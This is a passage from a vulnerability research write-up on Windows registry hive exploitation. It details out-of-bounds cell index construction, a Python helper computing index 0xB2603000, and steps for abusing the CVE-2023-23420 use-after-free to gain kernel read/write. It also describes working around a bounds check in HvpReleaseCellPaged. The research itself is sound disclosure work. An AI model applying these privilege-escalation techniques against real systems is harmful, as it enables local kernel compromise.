    0: kd> !pool ffff82828f096000+1000
    Pool page ffff82828f097000 region is Paged pool
    *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes
            Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob

    0: kd> !pool ffff82828f096000+2000
    Pool page ffff82828f098000 region is Paged pool
    *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes
            Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys

The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate “blindly”, but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.
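As a rough illustration of how far such an out-of-bounds access reaches, the sketch below computes which pool pages beyond a volatile bin would be touched by a value whose data cell sits in that bin and whose length exceeds the bin's bounds. The bin address and size come from the example above, while the cell offset and data lengths are hypothetical, as is the function name.

```python
PAGE = 0x1000


def pages_reached(bin_address, bin_size, cell_offset, data_length):
    """List the pool pages past the bin touched by the value's data.

    cell_offset is the offset of the data cell within the bin; the data
    itself starts 4 bytes later, after the cell size field.
    """
    data_start = bin_address + cell_offset + 4
    data_end = data_start + data_length  # exclusive end of the access
    bin_end = bin_address + bin_size
    if data_end <= bin_end:
        return []
    first_page = bin_end & ~(PAGE - 1)
    return list(range(first_page, data_end, PAGE))


if __name__ == "__main__":
    # Hypothetical value: data cell at offset 0x20 with a claimed length of 0x2000.
    for page in pages_reached(0xFFFF82828F096000, 0x1000, 0x20, 0x2000):
        print(hex(page))
```

With these inputs, the access would span the two neighboring pages that the debugger attributed to the Obtb and Gpbm allocations, which is the kind of layout an exploit would first read and verify before writing anything.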

The ultimate primitive: out-of-bounds cell indexes

The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one’s own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won’t work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes.

As a quick reminder, cell indexes are the hive’s equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table:

The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below:

```c
_CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {
  _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map
                            ->Directory[(Index >> 21) & 0x3FF]
                            ->Table[(Index >> 12) & 0x1FF];

  return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;
}
```



The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called “small dir”. In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[…].Map pointer to the address of the _CMHIVE.Hive.Storage[…].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below:

What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the “small dir” optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green).

This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the “Directory index” part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below:

In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an “array” located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors.
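The bit layout of a cell index can be checked with a short Python sketch. The helper names `split_cell_index` and `escapes_small_dir` are illustrative only and do not correspond to any Windows API; the field widths are taken from the shifts and masks in the HvpGetCellPaged pseudocode.

```python
def split_cell_index(index):
    """Split a 32-bit cell index into (storage, directory, table, offset)."""
    storage = (index >> 31) & 0x1      # 0 = stable, 1 = volatile
    directory = (index >> 21) & 0x3FF  # index into the directory level
    table = (index >> 12) & 0x1FF      # index into the table level
    offset = index & 0xFFF             # byte offset within the 4 KiB block
    return storage, directory, table, offset


def escapes_small_dir(index):
    """True if the index reads past the single-element SmallDir "array"."""
    _, directory, _, _ = split_cell_index(index)
    return directory != 0


print(split_cell_index(0x00200000))   # (0, 1, 0, 0)
print(escapes_small_dir(0x001FFFFF))  # False
print(escapes_small_dir(0x00200000))  # True
```

Any index whose low 31 bits are 0x200000 or greater has a non-zero directory part, which is exactly the condition under which a "small dir" hive dereferences memory beyond the SmallDir field.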

On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout:

```
0: kd> dt _HMAP_ENTRY
nt!_HMAP_ENTRY
   +0x000 BlockOffset         : Uint8B
   +0x008 PermanentBinAddress : Uint8B
   +0x010 MemAlloc            : Uint4B
```

And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options.
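The effect of this constraint can be illustrated with a minimal Python model of the last translation step. The function name `resolve_entry` is hypothetical, and the sample address is only a placeholder for a kernel pointer that happens to overlap one of the two fields.

```python
def resolve_entry(block_offset, permanent_bin_address, index):
    """Mirror the return expression of the HvpGetCellPaged pseudocode."""
    return (permanent_bin_address & ~0xF) + block_offset + (index & 0xFFF) + 4


target = 0xFFFF82828FC1A000  # sample kernel pointer we would like to reach

# The pointer overlaps PermanentBinAddress and BlockOffset is zero: usable.
print(hex(resolve_entry(0, target, 0)))     # 0xffff82828fc1a004

# The pointer overlaps BlockOffset and PermanentBinAddress is zero: usable.
print(hex(resolve_entry(target, 0, 0)))     # 0xffff82828fc1a004

# A non-zero neighbouring field skews the resulting address.
print(hex(resolve_entry(0x50, target, 0)))  # 0xffff82828fc1a054
```

Note that the low four bits of PermanentBinAddress are masked off, while BlockOffset is added unmodified.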

If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following:

The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. There are two reasons for this: first, the layout of the _HMAP_ENTRY structure (i.e., 0x18-byte alignment and the need for a 0x0 value adjacent to the given pointer), and second, the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides a good foundation for our exploit, but it does require additional experimentation to get every technical detail right.

Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn’t perform any additional bounds checks either. So, let’s stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We’ll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the “small dir” optimization, so we can choose either one; let’s say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields:

```
0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir)
(&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]
    0xffff82828fe6a000 [Type: _HMAP_TABLE *]
0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)
(&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm) : 0xffff82828fc1b038 [Type: _CM_RM * *]
    0xffff82828fdcc8e0 [Type: _CM_RM *]
```

In this case, it is (0xffff82828fc1b038 – 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18).

```
0: kd> dx (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)
(&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive) : 0xffff82828fdcc930 [Type: _CMHIVE * *]
    0xffff82828fc1a000 [Type: _CMHIVE *]
```

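So, the calculation is (0xffff82828fdcc930 – 0xffff82828fdcc8e0) ÷ 0x18 = 3, rounded down, with a remainder of 8 bytes that determines which _HMAP_ENTRY field the pointer overlaps. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure.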

```
0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18
nt!_HMAP_ENTRY
   +0x000 BlockOffset         : 0
   +0x008 PermanentBinAddress : 0xffff8282`8fc1a000
   +0x010 MemAlloc            : 0
```

The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zeroed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example.
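The two index calculations can be reproduced from the debugger addresses with a small Python sketch. The helper names are hypothetical; the constants (8-byte pointers, 0x18-byte _HMAP_ENTRY, field offsets) come from the structure dumps shown earlier.

```python
POINTER_SIZE = 8
HMAP_ENTRY_SIZE = 0x18
ENTRY_FIELDS = {0x00: "BlockOffset", 0x08: "PermanentBinAddress", 0x10: "MemAlloc"}


def directory_index(small_dir_addr, pointer_field_addr):
    """Directory index that makes the walk read the given pointer field."""
    delta = pointer_field_addr - small_dir_addr
    if delta < 0 or delta % POINTER_SIZE or delta // POINTER_SIZE > 0x3FF:
        raise ValueError("field is not reachable through a 10-bit directory index")
    return delta // POINTER_SIZE


def table_index(struct_base, field_addr):
    """Table index plus the _HMAP_ENTRY field that the target field overlaps."""
    index, remainder = divmod(field_addr - struct_base, HMAP_ENTRY_SIZE)
    if index > 0x1FF:
        raise ValueError("field is not reachable through a 9-bit table index")
    return index, ENTRY_FIELDS.get(remainder, "unaligned")


# Addresses taken from the WinDbg session above.
print(hex(directory_index(0xFFFF82828FC1A3A0, 0xFFFF82828FC1B038)))  # 0x193
print(table_index(0xFFFF82828FDCC8E0, 0xFFFF82828FDCC930))           # (3, 'PermanentBinAddress')
```

A result of "MemAlloc" or "unaligned" in the second element would indicate that the pointer cannot be used as the base address of the final translation step.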

We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function:

```python
>>> def MakeCellIndex(storage, directory, table, offset):
...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset))
...
```

And then pass the values we have established so far:

```python
>>> MakeCellIndex(1, 0x193, 3, 0)
0xb2603000
>>>
```

So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended.

```
0: kd> !reg cellindex ffff82828fc1a000 b2603000

Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0
MapTable     = ffff82828fdcc8e0
MapEntry     = ffff82828fdcc928
BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000
BlockAddress = ffff82828fc1a000

pcell:  ffff82828fc1a004
```

Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.
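To make the idea of inserting the index into _CM_KEY_VALUE.Data more concrete, here is a hedged Python sketch that packs a value node carrying the out-of-bounds index. The field order follows the publicly documented regf "vk" record (signature, name length, data length, data cell index, type, flags, spare, name); the helper `make_key_value` is hypothetical, the 4-byte cell size header is not included, and the sample name, type and length are illustration values rather than a reproduction of the actual exploit code.

```python
import struct

REG_BINARY = 3
VALUE_COMP_NAME = 0x0001  # the value name is stored as compressed (ASCII) text


def make_key_value(name, data_index, data_length, value_type):
    """Pack a value node body: fixed 0x14-byte header followed by the name."""
    header = struct.pack(
        "<2sHIIIHH",
        b"vk",            # Signature
        len(name),        # NameLength
        data_length,      # DataLength
        data_index,       # Data (cell index of the backing buffer)
        value_type,       # Type
        VALUE_COMP_NAME,  # Flags
        0,                # Spare
    )
    return header + name


node = make_key_value(b"KernelData", 0xB2603000, 0x100, REG_BINARY)
print(len(node), node.hex())
```

With such a node in place, any query or set operation on the value is translated through the cell map using the attacker-chosen index.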

Writing the exploit

At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It’s time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.

Step 0: Choosing the vulnerability

Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit’s actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let’s briefly examine two distinct possibilities.

CVE-2022-34707

The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes.

Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn’t be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.



CVE-2023-23420

This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations.

In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that’s what we’ll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it’s nothing we can’t handle. So let’s get to work!

Step 1: Abusing the UAF to establish dynamically-controlled value cells

Let’s start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn’t much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we’ll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout:

At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the “TmpKeyName” key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the “rename” operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, “SubKey1” and “SubKey2”, which are also needed in the exploitation process for transactional deletion, each through a different view of their parent.

Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section “Operating on subkeys of transactionally renamed keys”, and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps:

- Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.

- Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.

- Performing a transactional rename operation on one of these handles, changing the name to “Scratchpad”.

- Transactionally deleting the “SubKey1” and “SubKey2” keys, each through a different parent handle (one renamed, the other not).

- Committing the entire transaction by calling the NtCommitRegistryTransaction syscall.

After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly:

We see that the “TmpKeyName” key has been renamed to “Scratchpad”, and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent’s subkey list. At this point, we want to use the four values of the “Scratchpad” key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named “KernelAddr” and “KernelData”. Each of the “Container” values is responsible for imitating one type of object, and the most crucial role is played by the “FakeKeyContainer” value. Its backing buffer must perfectly align with the memory previously associated with the “SubKey1” key node. The diagram below illustrates the desired outcome:

All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the “FakeKey” using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps:

- Writing to the “FakeKeyContainer” value with an initial, basic representation of the “FakeKey” key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the “Scratchpad” key.

- Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.

- Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the “ValueListContainer”, “KernelAddrContainer” and “KernelDataContainer” values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the “FakeKey” to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, … in subsequent loop iterations. This enables a kind of “arbitrary hive read” primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the “Scratchpad” key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.

- Using the above information to set the correct data for each of the four cells: the key node of the “FakeKey” key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of “KernelAddr” and “KernelData”. This makes “FakeKey” a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us.
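The scanning part of the info-leak loop described in the steps above can be sketched in Python. This is a simulation under stated assumptions: `leak_reader` is a hypothetical callback standing in for the NtEnumerateKey-based read of the class data, the marker is assumed to sit at the very start of a data cell, and the conversion from a match position to a cell index is derived from the "+ 4" in the HvpGetCellPaged pseudocode (a read through index X returns bytes starting at hive offset X + 4, so a cell whose data begins at the match has index X + position).

```python
PAGE_SIZE = 0x1000
CLASS_LENGTH = 0xFFC       # ClassLength used for every read
VOLATILE_BIT = 0x80000000  # storage type 1 (volatile)
CELL_HEADER = 4            # size field preceding the cell data


def class_indexes(volatile_length):
    """Yield the Class cell indexes used on consecutive loop iterations."""
    for page_offset in range(0, volatile_length, PAGE_SIZE):
        yield VOLATILE_BIT | page_offset


def find_marker_cell(leak_reader, volatile_length, marker):
    """Return the index of the cell whose data starts with the marker, or None."""
    for index in class_indexes(volatile_length):
        leaked = leak_reader(index, CLASS_LENGTH)
        position = leaked.find(marker)
        if position != -1:
            return index + position
    return None


# Simulated volatile space: a cell at offset 0x1230 whose data starts at 0x1234.
hive = bytearray(0x3000)
hive[0x1234:0x1234 + 8] = b"MARKER01"


def fake_reader(index, length):
    start = (index & 0x7FFFFFFF) + CELL_HEADER
    return bytes(hive[start:start + length])


print(hex(find_marker_cell(fake_reader, len(hive), b"MARKER01")))  # 0x80001230
```

Reading 0xFFC bytes from a page-aligned index covers the rest of that 4 KiB page, which is why the loop advances in steps of 0x1000.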

If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra “Filler” value is used to fill the space occupied by the old “TmpKeyName” key node freed during the rename operation. This is necessary so that the data of the “FakeKeyContainer” value correctly aligns with the freed cell of the “SubKey1” key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity.

Step 2: Getting read/write access to the CMHIVE kernel object

Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let’s say that we set the type of the “KernelData” value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive’s _CMHIVE structure on the kernel pool. If we do this, and then browse to the “FakeKey” key in the Registry Editor, we will encounter an unpleasant surprise:

This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information:

```
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff800`8061ff20 cc              int     3
0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

REGISTRY_ERROR (51)
Something has gone badly wrong with the registry. If a kernel debugger
is available, get a stack trace. It can also indicate that the registry got
an I/O error while trying to read one of its files, so it can be caused by
hardware problems or filesystem corruption.
It may occur due to a failure in a refresh operation, which is used only
in by the security system, and then only when resource limits are encountered.
Arguments:
Arg1: 0000000000000001, (reserved)
Arg2: ffffd4855dc36000, (reserved)
Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive
Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of HvCheckHive if the hive is corrupt.

[…]

0: kd> k
 # Child-SP          RetAddr               Call Site
00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus
01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12
02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71
03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107
04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5
05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5
06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e
07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e
08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25
09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114
```

We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven’t really mentioned so far in this blog post series.

To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:

```c
_HV_GET_CELL_CONTEXT Context;

//
// Translate the cell index to virtual address
//
PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);

//
// Operate on the cell view using the CellAddress pointer
//
...

//
// Release the cell
//
Hive->ReleaseCellRoutine(Hive, &Context);
```

There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls.

The presence or absence of the “release” function in consecutive Windows versions is shown below:

- Windows NT 3.1 – 2000: ❌

- Windows XP – 7: ✅

- Windows 8 – 8.1: ❌

- Windows 10 – 11: ✅

Let’s take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x:

```c
VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {
  _HCELL_INDEX RealCell;
  _HMAP_ENTRY *MapEntry;

  RealCell = Context->Cell & 0xFFFFFFFE;
  MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);

  if (MapEntry == NULL) {
    KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);
  }

  if ((Context->Cell & 1) != 0) {
    HvpMapEntryReleaseBinAddress(MapEntry);
  }

  HvpGetCellContextReinitialize(Context);
}

_HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {
  DWORD StorageType = CellIndex >> 31;
  DWORD StorageIndex = CellIndex & 0x7FFFFFFF;

  if (StorageIndex < Hive->Storage[StorageType].Length) {
    return &Hive->Storage[StorageType].Map
                ->Directory[(CellIndex >> 21) & 0x3FF]
                ->Table[(CellIndex >> 12) & 0x1FF];
  } else {
    return NULL;
  }
}

VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {
  ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown);
}

VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {
  Context->Cell = -1;
  Context->Hive = NULL;
}
```

As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRundown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered.

This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form:

```c
VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {
  _HCELL_INDEX Cell = Context->Cell;
  DWORD StorageIndex = Cell & 0x7FFFFFFF;
  DWORD StorageType = Cell >> 31;

  if (StorageIndex >= Hive->Storage[StorageType].Length ||
      &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {
    KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);
  }

  Context->Cell = -1;
  Context->BinContext = 0;
}
```

The bounds check on the cell index is clearly still present, but it doesn’t serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead?

As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn’t be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea’s usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a “pwn” task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let’s take another look at the if statement that stands in our way:

```c
if (StorageIndex >= Hive->Storage[StorageType].Length || /* … */) {
  KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);
}
```

The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage:

```
0: kd> dx (&((_HHIVE*)0)->Storage[0].Length)
(&((_HHIVE*)0)->Storage[0].Length) : 0x118
0: kd> dx (&((_HHIVE*)0)->Storage[1].Length)
(&((_HHIVE*)0)->Storage[1].Length) : 0x390
```

As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above and subtracting 4 (to compensate for the 4 bytes that the cell map walk adds in order to skip the cell size field), we can obtain an index that points directly to the Length field. Let’s test this in practice:

```
0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)
